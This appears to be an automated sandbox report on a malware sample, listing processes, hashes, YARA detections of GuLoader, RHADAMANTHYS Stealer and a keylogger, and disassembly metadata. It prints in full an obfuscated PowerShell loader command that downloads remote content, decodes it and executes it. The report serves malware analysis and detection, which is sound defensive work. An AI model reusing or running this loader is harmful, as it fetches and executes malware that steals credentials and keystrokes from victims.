                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:13:26:16
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;"
                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:13:26:16
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:13:26:29
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De,mt Go arSp= u$UnAfds obMioAdl oialtane') ;cleavingly $Pastina;cleavingly (Symboltabeller 'BjS iTTaAsurFitT -StSE L EovE.oP,o Se4');cleavingly (Symboltabeller 'Go$NoGL lFlOPrb LAGalS : awBie Re .k IEkoN OdG U ,dKvfOvlSpUNoG.itTjePiRA NTyeD,smi=M,( ft.pe SsTrT - CpF.AKot hSp Fe$Mus TopeW,M ,N.kIV.NPlGV.SAlfPhu kLGrDCaT o)') ;cleavingly (Symboltabeller 'Sy$ Dg rL ao,mBB.aT Lst:deuT nChm .uArfSuF SlSne aSTr= i$ sgGlLSiO.abS,a Tl o: KaR LBeEUfTPaH MoPaP.rtIneU IEtsSk+Pe+No%Fl$G,V eA aU bExeKiNsafHuAUnbEkrB i nKSy.dycOvO uprN ,t') ;$Eliksirers=$Vaabenfabrik[$Unmuffles]}$Velfunderede=317450;$autoriserendes=28180;cleavingly (Symboltabeller ' w$PlGXyLAmO eBBlabol n:Mef nrFadZaiLsG MbMoY ogO gMieUdTB, Vi= U SegB,EbetCh-UoC uoVeNQuTB e,unF.t i Fi$P sAntAtEU MTen oiFoN SGSaSAffU,UMylInDNot');cleavingly (Symboltabeller 'Ud$opgSplCroPebHjaUdlMe: TE np HoWhc HhB.e N=Sy Vi[DeS,eyR sMatNee.mmFn.,pCRioInnRevReeSarP t ]Ca:Sn:K F arNao PmU B oa asRyeMi6B 4 aS BtIprRoi unAng D( a$.eF FrTid .i gPrb,yyAfgSug be Pt s)');cleavingly (Symboltabeller 'T.$ .g .lT.OInbEsaQul o: eFSpl KJ VL usBeGLrR,iS u D =Re D[ osHeYI sS TSkE mBa. yT.nED x Ct E. ae NReCReOEgdS I DN eG,e]H,:C.:R ATysB CNaislIQu.AdGP eB,TVesSaTElR ,I,enSygte( R$ WEHop moN.c .HDiEB )');cleavingly (Symboltabeller 'Fe$Hog .lUnO Fb ea FLOu:KoBKaARet rtC,aRaLCoineaFo=.b$ReFSulUnJ iL ksDeG ,RG S F. ps fuC.b ysAltKoR,iIP.nTyGLo(.o$ToVUneFuLdeFTaU SnG dHaESorAkEFaDFoERe, ,$Una lUigT o Vr eI Ps SEM RPeeBrn HdAse.rS,a)');cleavingly $Battalia;"
                                                                                                                                                Imagebase:0x8e0000
                                                                                                                                                File size:433'152 bytes
                                                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2206243160.0000000008870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000B.00000002.2184442269.0000000005AA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2206780422.000000000C3AB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:13:26:29
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:13:26:37
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\rdc7di6ccs.docx" /o ""
                                                                                                                                                Imagebase:0x890000
                                                                                                                                                File size:1'620'872 bytes
                                                                                                                                                MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:13:26:40
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:13:26:53
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                Imagebase:0xaa0000
                                                                                                                                                File size:59'904 bytes
                                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2349020034.00000000247D0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2346049870.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000013.00000003.2360678869.0000000023FB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2348832921.00000000245B0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:13:27:12
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                Imagebase:0x780000
                                                                                                                                                File size:46'504 bytes
                                                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000003.2350109419.0000000000760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000014.00000002.2450181314.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2353334391.0000000004D60000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000003.2353660674.0000000004F80000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:13:27:22
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                Imagebase:0x7ff6eef20000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:13:27:35
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrEA6C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/df460fc7/4a1b3c1a"
                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:13:27:36
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2512,i,3131430340746137316,18275235593028859389,262144 /prefetch:8
                                                                                                                                                Imagebase:0x7ff76e190000
                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:13:27:55
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Program Files\Windows Media Player\wmprph.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\wmprph.exe"
                                                                                                                                                Imagebase:0x7ff71c190000
                                                                                                                                                File size:86'528 bytes
                                                                                                                                                MD5 hash:B4298167D12E6AC4618518E0B6326802
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:13:27:57
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:21'312 bytes
                                                                                                                                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FFD9B7933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3155027833.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                                  • Instruction ID: fdbc930351deee709ea40e3ab036fe4a0cb1294021e6e5309a9e464b77d654a6
                                                                                                                                                  • Opcode Fuzzy Hash: 5da2c6b30f459f635ce5dc462c2373d4b27d0aa50ea3d8b2107ca56167582fe6
                                                                                                                                                  • Instruction Fuzzy Hash: 5D01A73020CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC36A1DA32E882CB41

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00007FFD9B790CD4 Relevance: .4, Instructions: 389COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.3155027833.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b790000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8426c1631a9cb64280ea2bc42458d9c5ff3be0c6b4bfecf0112907e853a4e5f0
                                                                                                                                                  • Instruction ID: 729dd0e0a9d6ba2b99e23bdc92349ff933784949813f8f47c32fa0b04ef2bc69
                                                                                                                                                  • Opcode Fuzzy Hash: 8426c1631a9cb64280ea2bc42458d9c5ff3be0c6b4bfecf0112907e853a4e5f0
                                                                                                                                                  • Instruction Fuzzy Hash: C8C1F553E1FBDA1FF76266AC18760E57F90EF52A5470E02F7C4D44A4F3AD056E0A8282

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FFD9B78AB4A Relevance: .5, Instructions: 489COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3bc8873ec7fe127f2efcb34ec5d5b7ea60888730412fe5a0bac928f5e2a060f4
                                                                                                                                                  • Instruction ID: c8a71c8abd9d0b65e6dce30ae16bf5428ce60b874304e4cc77d4e191d0a6e372
                                                                                                                                                  • Opcode Fuzzy Hash: 3bc8873ec7fe127f2efcb34ec5d5b7ea60888730412fe5a0bac928f5e2a060f4
                                                                                                                                                  • Instruction Fuzzy Hash: A1F19230A09F4D8FEBA8DF68C8957E937E1FF54311F04426AE85DC72A5DB3499418B81
                                                                                                                                                  Function 00007FFD9B78B8D2 Relevance: .5, Instructions: 460COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1959409725.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ffd9b780000_powershell.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 445e1c9a6ace4de515f0cea24b7695dd7f37adae576c26c81d5b22104b9dd09a
                                                                                                                                                  • Instruction ID: 3de8423535ef07195f1419504891b70834ca7a38bc8d549b3d4aa7be7a2b610b
                                                                                                                                                  • Opcode Fuzzy Hash: 445e1c9a6ace4de515f0cea24b7695dd7f37adae576c26c81d5b22104b9dd09a
                                                                                                                                                  • Instruction Fuzzy Hash: 5DE1E330A0CE4D8FEBA8DF28C8A57F937E1FF54311F04426AD84DC72A5CA7599418782
                                                                                                                                                  Function 00007FFD9B855319 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1960142207.00007FFD9B850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B850000, based on PE: false
